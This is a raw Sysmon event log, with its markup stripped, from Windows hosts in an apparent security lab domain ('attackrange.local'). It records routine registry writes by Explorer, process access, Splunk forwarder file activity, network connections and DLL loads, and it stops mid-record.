19:19:13.482{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095433Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:13.154{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BFCBB7E9688591B14047CA47882DE2F,SHA256=8B8BE9412A26E69C8E59DFDB776DD2CE8FC04349B60D4B026AC9EFD37FAA7F31,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001606896Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:13.816{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001606895Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:13.816{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.RkcybereBinary Data 354300x80000000000000001606894Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:11.643{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49742-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x80000000000000001606893Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.520{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEWIN-HOST-5\Administratortcptruefalse10.0.1.15win-host-5.attackrange.local49740-false52.114.132.23-443https 11241100x80000000000000001606892Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:13.195{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606891Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:13.195{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=884E0949FE3E560D911A9BB36B904233,SHA256=F2DA3A9EB95547A6ECBA14325D7CD02565E486D1F6719F82A91544C1BF18DD5Cfalsefalse - insufficient disk space 13241300x80000000000000001606954Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:14.217{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\NavPane\ExpandedStateBinary Data 12241200x80000000000000001606953Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:14.217{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\NavPane 13241300x80000000000000001606952Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:14.217{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\NavPane\ExpandedStateBinary Data 12241200x80000000000000001606951Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:14.217{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\NavPane 13241300x80000000000000001606950Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:14.217{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\GlobalSettings\ProperTreeModuleInner\ProperTreeModuleInnerBinary Data 12241200x80000000000000001606949Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:14.217{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\GlobalSettings\ProperTreeModuleInner 13241300x80000000000000001606948Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:14.064{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:000000000007050C\VirtualDesktopBinary Data 12241200x80000000000000001606947Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:14.064{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:000000000007050C 13241300x80000000000000001606946Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:14.001{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001606945Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:14.001{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001606944Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:14.001{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001606943Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:14.001{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001606942Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:14.001{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001606941Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:14.001{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.RkcybereBinary Data 13241300x80000000000000001606940Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:14.001{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001606939Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:14.001{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\GlobalSettings\ProperTreeModuleInner\ProperTreeModuleInnerBinary Data 12241200x80000000000000001606938Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:14.001{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\GlobalSettings\ProperTreeModuleInner 12241200x80000000000000001606937Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:14.000{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 13241300x80000000000000001606936Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:14.000{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListExBinary Data 12241200x80000000000000001606935Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:14.000{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 13241300x80000000000000001606934Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:14.000{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlotsBinary Data 12241200x80000000000000001606933Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:14.000{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU 10341000x80000000000000001095438Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:14.483{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095437Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:14.483{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095436Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:14.159{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2C185FBC7583DE19B25EA168B921687,SHA256=2FE5020586ABB33BB74D1FCBBE8E35A4CF37AAE06B05AFE3F42CEDD86756211F,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606964Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:15.436{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 11241100x80000000000000001606963Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:15.436{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606962Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:15.436{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=947F5421D75EFF0C1F5AACBB3CDBBAC5,SHA256=33898142EEDB45EA5D35A74977AC856F4C2EE68E1B355963AA89C7486C204598falsefalse - insufficient disk space 23542300x80000000000000001606961Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:15.436{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AF7E5CCE08589E2BDDC94D20C9A5A6F8,SHA256=95FB4DAE68AF713D3CB29862B45FCDCAF2400AC9A2561991349C239195DA3039falsefalse - insufficient disk space 354300x80000000000000001606960Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:13.564{21761711-83AE-607D-1400-00000000BB01}480C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10f:0:0:58d1:635f:9ae:ffff-61343-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x80000000000000001606959Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:13.564{21761711-83AE-607D-1400-00000000BB01}480C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:e939:94d:a3e8:982dwin-host-5.attackrange.local61343-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x80000000000000001606958Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:13.564{21761711-83A4-607D-0100-00000000BB01}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255ip-10-0-1-255.us-west-2.compute.internal137netbios-nsfalse10.0.1.15win-host-5.attackrange.local137netbios-ns 354300x80000000000000001606957Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:13.564{21761711-83A4-607D-0100-00000000BB01}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.15win-host-5.attackrange.local137netbios-nsfalse10.0.1.255ip-10-0-1-255.us-west-2.compute.internal137netbios-ns 11241100x80000000000000001606956Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:15.066{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xml2021-04-19 13:22:46.774 23542300x80000000000000001606955Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:15.066{21761711-842A-607D-9700-00000000BB01}3716NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=E21F5C2105D3482548EE1DCEAA8E3F18,SHA256=A62C5AB5FD16B72845400EE5338C4D5D0AC27884510730AA80A58BEA4A9B021Efalsefalse - insufficient disk space 354300x80000000000000001095445Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:10.629{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1168-false10.0.1.12-8000- 354300x80000000000000001095444Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:10.615{761B69BB-819C-607D-2800-00000000BA01}2912C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-982.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal57003- 354300x80000000000000001095443Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:10.613{761B69BB-819C-607D-2800-00000000BA01}2912C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-982.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal52624- 10341000x80000000000000001095442Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:15.484{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095441Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:15.484{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095440Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:15.164{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C9568B60DEB8FF4977024A8884B76F5,SHA256=771630085153C475E42F28F80B4752CDEE9C5D0B5493E29FE13178644DE7EFEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095439Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:15.023{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=026C2732F900FDF87615815C76A3607A,SHA256=D7CAD4F98C8D3F77CFBF854C12A5E0C09B3F1B61649353E306532B772E9EDE83,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095448Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:16.485{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095447Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:16.485{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095446Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:16.175{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BA21ACF97D96DC9AE43B2A7EBFC5C0A,SHA256=61A32F2BF31CEE83FDF1D35B0B82335E3955A109E256626061AF576CB5DA33D2,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606973Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:16.539{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606972Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:16.539{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8853BA6A646622C564286C6D314EF6D7,SHA256=E0CC84039F554CB652334C5994181EAAAAC7BF0E7C83BF24F3CD670D4065831Ffalsefalse - insufficient disk space 12241200x80000000000000001606971Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:16.523{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{bd98497a-0000-0000-0000-100000000000} 734700x80000000000000001606970Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:16.454{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\explorer.exeC:\Windows\System32\EhStorAPI.dll10.0.14393.4169 (rs1_release.210107-1130)Windows Enhanced Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationEhStorapi.dllMD5=1287D2464B3F71ECC99316991E038B0B,SHA256=7FFA04958C7E76E42712E8D9E03037E3E98E2A6E1A6D277E48A76C55F4E794E8trueMicrosoft WindowsValid 734700x80000000000000001606969Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:16.454{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\explorer.exeC:\Windows\System32\wpdshext.dll10.0.14393.4169 (rs1_release.210107-1130)Portable Devices Shell ExtensionMicrosoft® Windows® Operating SystemMicrosoft CorporationWpdShExt.dllMD5=CEB555E9099888316A1E2ADE83BA82BF,SHA256=4110FFD5F08100D1F6E1005E2907460E40B3221A0833B821BE291657416E89F0trueMicrosoft WindowsValid 734700x80000000000000001606968Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:16.438{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\explorer.exeC:\Windows\System32\PlayToDevice.dll10.0.14393.4169 (rs1_release.210107-1130)PLAYTODEVICE DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPlaytoDevice.dllMD5=0B283806F6BEEE6509E9F8C3FCA10286,SHA256=4DC982EC3F8B81CF8BF0F56ED5CEF628C28A1620CC12B94CAFADCD7CE684B6E2trueMicrosoft WindowsValid 354300x80000000000000001606967Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:14.616{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49743-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 11241100x80000000000000001606966Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:16.084{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606965Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:16.084{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4604ED8D71EEEE689E545EC097ADA721,SHA256=53B496B874561542EC30CB8E7CEAD4E6BB353ED796A5723EF9C9DE60F738DC59falsefalse - insufficient disk space 10341000x80000000000000001095451Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 